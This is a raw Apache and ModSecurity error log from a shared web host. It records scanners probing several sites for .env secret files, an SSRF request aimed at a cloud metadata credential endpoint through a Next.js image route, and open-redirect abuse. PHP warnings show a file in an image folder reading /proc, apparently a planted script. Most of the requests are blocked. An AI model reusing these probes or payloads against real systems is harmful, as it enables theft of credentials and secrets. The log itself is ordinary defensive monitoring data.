[Tue May 12 02:39:43.007045 2026] [:error] [pid 1707624:tid 1707686] [client 93.123.109.164:37988] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 02:39:43.008318 2026] [security2:error] [pid 1709071:tid 1709107] [client 93.123.109.164:37814] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "totalcloud.fr"] [uri "/.env"] [unique_id "agJ2z7vMumyrWMfSu7qo4QAAANQ"]
[Tue May 12 02:39:43.008452 2026] [security2:error] [pid 1709071:tid 1709107] [client 93.123.109.164:37814] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "totalcloud.fr"] [uri "/.env"] [unique_id "agJ2z7vMumyrWMfSu7qo4QAAANQ"]
[Tue May 12 02:39:43.008685 2026] [security2:error] [pid 1709071:tid 1709107] [client 93.123.109.164:37814] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "totalcloud.fr"] [uri "/403.shtml"] [unique_id "agJ2z7vMumyrWMfSu7qo4QAAANQ"]
[Tue May 12 02:39:43.013374 2026] [:error] [pid 1707624:tid 1707703] [client 93.123.109.164:37856] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 02:39:43.314942 2026] [:error] [pid 1707624:tid 1707703] [client 93.123.109.164:37856] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 02:39:43.347340 2026] [security2:error] [pid 1707624:tid 1707703] [client 93.123.109.164:37856] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "totalcloud.fr"] [uri "/.env"] [unique_id "agJ2z7OxS7i6i_mT2NLHaQAAAFU"]
[Tue May 12 02:39:43.347465 2026] [security2:error] [pid 1707624:tid 1707703] [client 93.123.109.164:37856] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "totalcloud.fr"] [uri "/.env"] [unique_id "agJ2z7OxS7i6i_mT2NLHaQAAAFU"]
[Tue May 12 02:39:43.350167 2026] [security2:error] [pid 1707624:tid 1707703] [client 93.123.109.164:37856] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "totalcloud.fr"] [uri "/403.shtml"] [unique_id "agJ2z7OxS7i6i_mT2NLHaQAAAFU"]
[Tue May 12 02:39:43.405137 2026] [security2:error] [pid 1691274:tid 1691490] [client 93.123.109.164:37918] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "totalcloud.fr"] [uri "/.env"] [unique_id "agJ2z1fdQaraX_prmqceSAAAABU"]
[Tue May 12 02:39:43.405269 2026] [security2:error] [pid 1691274:tid 1691490] [client 93.123.109.164:37918] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "totalcloud.fr"] [uri "/.env"] [unique_id "agJ2z1fdQaraX_prmqceSAAAABU"]
[Tue May 12 02:39:43.405515 2026] [security2:error] [pid 1691274:tid 1691490] [client 93.123.109.164:37918] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "totalcloud.fr"] [uri "/403.shtml"] [unique_id "agJ2z1fdQaraX_prmqceSAAAABU"]
[Tue May 12 02:39:43.447543 2026] [:error] [pid 1707624:tid 1707703] [client 93.123.109.164:37856] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 02:39:43.449758 2026] [security2:error] [pid 1709071:tid 1709107] [client 93.123.109.164:37814] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "totalcloud.fr"] [uri "/.env.local"] [unique_id "agJ2z7vMumyrWMfSu7qo4wAAANQ"]
[Tue May 12 02:39:43.449929 2026] [security2:error] [pid 1709071:tid 1709107] [client 93.123.109.164:37814] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "totalcloud.fr"] [uri "/.env.local"] [unique_id "agJ2z7vMumyrWMfSu7qo4wAAANQ"]
[Tue May 12 02:39:43.450197 2026] [security2:error] [pid 1709071:tid 1709107] [client 93.123.109.164:37814] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "totalcloud.fr"] [uri "/403.shtml"] [unique_id "agJ2z7vMumyrWMfSu7qo4wAAANQ"]
[Tue May 12 02:39:43.452323 2026] [:error] [pid 1707624:tid 1707686] [client 93.123.109.164:37988] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 02:39:43.548230 2026] [:error] [pid 1709071:tid 1709107] [client 93.123.109.164:37814] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 02:39:43.565295 2026] [:error] [pid 1707624:tid 1707686] [client 93.123.109.164:37988] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 02:39:43.661262 2026] [security2:error] [pid 1707624:tid 1707703] [client 93.123.109.164:37856] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "totalcloud.fr"] [uri "/api/.env"] [unique_id "agJ2z7OxS7i6i_mT2NLHbQAAAFU"]
[Tue May 12 02:39:43.661460 2026] [security2:error] [pid 1707624:tid 1707703] [client 93.123.109.164:37856] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "totalcloud.fr"] [uri "/api/.env"] [unique_id "agJ2z7OxS7i6i_mT2NLHbQAAAFU"]
[Tue May 12 02:39:43.661726 2026] [security2:error] [pid 1707624:tid 1707703] [client 93.123.109.164:37856] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "totalcloud.fr"] [uri "/403.shtml"] [unique_id "agJ2z7OxS7i6i_mT2NLHbQAAAFU"]
[Tue May 12 02:39:44.774675 2026] [security2:error] [pid 1707624:tid 1707702] [client 93.123.109.164:38032] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "totalcloud.fr"] [uri "/api/.env"] [unique_id "agJ20LOxS7i6i_mT2NLHbgAAAFQ"]
[Tue May 12 02:39:44.774874 2026] [security2:error] [pid 1707624:tid 1707702] [client 93.123.109.164:38032] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "totalcloud.fr"] [uri "/api/.env"] [unique_id "agJ20LOxS7i6i_mT2NLHbgAAAFQ"]
[Tue May 12 02:39:44.775556 2026] [:error] [pid 1709071:tid 1709106] [client 93.123.109.164:38022] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 02:39:44.779112 2026] [security2:error] [pid 1707624:tid 1707702] [client 93.123.109.164:38032] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "totalcloud.fr"] [uri "/403.shtml"] [unique_id "agJ20LOxS7i6i_mT2NLHbgAAAFQ"]
[Tue May 12 02:39:46.339581 2026] [:error] [pid 1730207:tid 1730215] [client 93.123.109.164:38038] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 02:39:46.360250 2026] [:error] [pid 1730207:tid 1730215] [client 93.123.109.164:38038] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 02:39:47.695788 2026] [:error] [pid 1709071:tid 1709104] [client 93.123.109.164:38048] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 02:39:48.022341 2026] [:error] [pid 1709071:tid 1709104] [client 93.123.109.164:38048] File does not exist: /home/totalcloud/public_html/index.php
PHP Warning:  filesize(): stat failed for /proc/1022/task/1022/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1022/task/1022/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1022/task/1022/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1022/task/1022/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1022/task/1022/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1022/task/1022/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 02:40:11.388655 2026] [ssl:error] [pid 1709071:tid 1709096] (EAI 2)Name or service not known: [client 116.202.235.23:55156] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 02:40:11.388698 2026] [ssl:error] [pid 1709071:tid 1709096] AH01941: stapling_renew_response: responder error
[Tue May 12 02:40:11.436994 2026] [ssl:error] [pid 1707624:tid 1707693] (EAI 2)Name or service not known: [client 116.202.235.23:55162] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 02:40:11.437024 2026] [ssl:error] [pid 1707624:tid 1707693] AH01941: stapling_renew_response: responder error
[Tue May 12 02:40:11.485024 2026] [ssl:error] [pid 1691274:tid 1691295] (EAI 2)Name or service not known: [client 116.202.235.23:55166] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 02:40:11.485044 2026] [ssl:error] [pid 1691274:tid 1691295] AH01941: stapling_renew_response: responder error
[Tue May 12 02:40:11.532665 2026] [ssl:error] [pid 1730175:tid 1730182] (EAI 2)Name or service not known: [client 116.202.235.23:55168] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 02:40:11.532699 2026] [ssl:error] [pid 1730175:tid 1730182] AH01941: stapling_renew_response: responder error
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1705056/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1705056/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1705056/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1705056/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1705056/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1705056/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 02:40:48.593161 2026] [security2:error] [pid 1707624:tid 1707687] [client 43.133.61.171:57930] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJ3ELOxS7i6i_mT2NLHkQAAAEU"], referer: http://www.piregwan-genesis.com/liens/redirect.php?url=https://bikinartikel.com
[Tue May 12 02:41:27.451952 2026] [security2:error] [pid 1707624:tid 1707697] [client 93.123.109.165:4240] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/iam/security-credentials/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "of-crystal-lake.net"] [uri "/_next/image"] [unique_id "agJ3N7OxS7i6i_mT2NLHpAAAAE8"]
[Tue May 12 02:41:27.452703 2026] [security2:error] [pid 1707624:tid 1707697] [client 93.123.109.165:4240] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/_next/image"] [unique_id "agJ3N7OxS7i6i_mT2NLHpAAAAE8"]
[Tue May 12 02:41:27.453000 2026] [security2:error] [pid 1707624:tid 1707697] [client 93.123.109.165:4240] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/_next/image"] [unique_id "agJ3N7OxS7i6i_mT2NLHpAAAAE8"]
[Tue May 12 02:41:27.453506 2026] [security2:error] [pid 1730207:tid 1730209] [client 93.123.109.165:4184] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/.env.local"] [unique_id "agJ3Nzue9Sp-pIv_Bb6P0AAAAUA"]
[Tue May 12 02:41:27.453631 2026] [security2:error] [pid 1730207:tid 1730209] [client 93.123.109.165:4184] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/.env.local"] [unique_id "agJ3Nzue9Sp-pIv_Bb6P0AAAAUA"]
[Tue May 12 02:41:27.453842 2026] [security2:error] [pid 1730207:tid 1730209] [client 93.123.109.165:4184] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/.env.local"] [unique_id "agJ3Nzue9Sp-pIv_Bb6P0AAAAUA"]
[Tue May 12 02:41:27.456461 2026] [:error] [pid 1730175:tid 1730178] [client 93.123.109.165:4200] File does not exist: /home/ofcrysta/public_html/info.php
[Tue May 12 02:41:27.457014 2026] [security2:error] [pid 1707624:tid 1707691] [client 93.123.109.165:4312] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/.env"] [unique_id "agJ3N7OxS7i6i_mT2NLHpgAAAEk"]
[Tue May 12 02:41:27.457141 2026] [security2:error] [pid 1707624:tid 1707691] [client 93.123.109.165:4312] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/.env"] [unique_id "agJ3N7OxS7i6i_mT2NLHpgAAAEk"]
[Tue May 12 02:41:27.457428 2026] [security2:error] [pid 1707624:tid 1707691] [client 93.123.109.165:4312] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/.env"] [unique_id "agJ3N7OxS7i6i_mT2NLHpgAAAEk"]
[Tue May 12 02:41:27.468221 2026] [security2:error] [pid 1707624:tid 1707689] [client 93.123.109.165:4176] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/.env.production"] [unique_id "agJ3N7OxS7i6i_mT2NLHpwAAAEc"]
[Tue May 12 02:41:27.468271 2026] [security2:error] [pid 1691274:tid 1691285] [client 93.123.109.165:4274] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/.env.development"] [unique_id "agJ3N1fdQaraX_prmqcelgAAAAg"]
[Tue May 12 02:41:27.468357 2026] [security2:error] [pid 1707624:tid 1707689] [client 93.123.109.165:4176] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/.env.production"] [unique_id "agJ3N7OxS7i6i_mT2NLHpwAAAEc"]
[Tue May 12 02:41:27.468396 2026] [security2:error] [pid 1691274:tid 1691285] [client 93.123.109.165:4274] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/.env.development"] [unique_id "agJ3N1fdQaraX_prmqcelgAAAAg"]
[Tue May 12 02:41:27.468547 2026] [security2:error] [pid 1707624:tid 1707689] [client 93.123.109.165:4176] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/.env.production"] [unique_id "agJ3N7OxS7i6i_mT2NLHpwAAAEc"]
